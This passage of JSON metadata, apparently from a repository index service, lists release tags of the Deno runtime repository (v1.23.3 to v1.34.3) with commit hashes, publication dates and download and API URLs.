tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23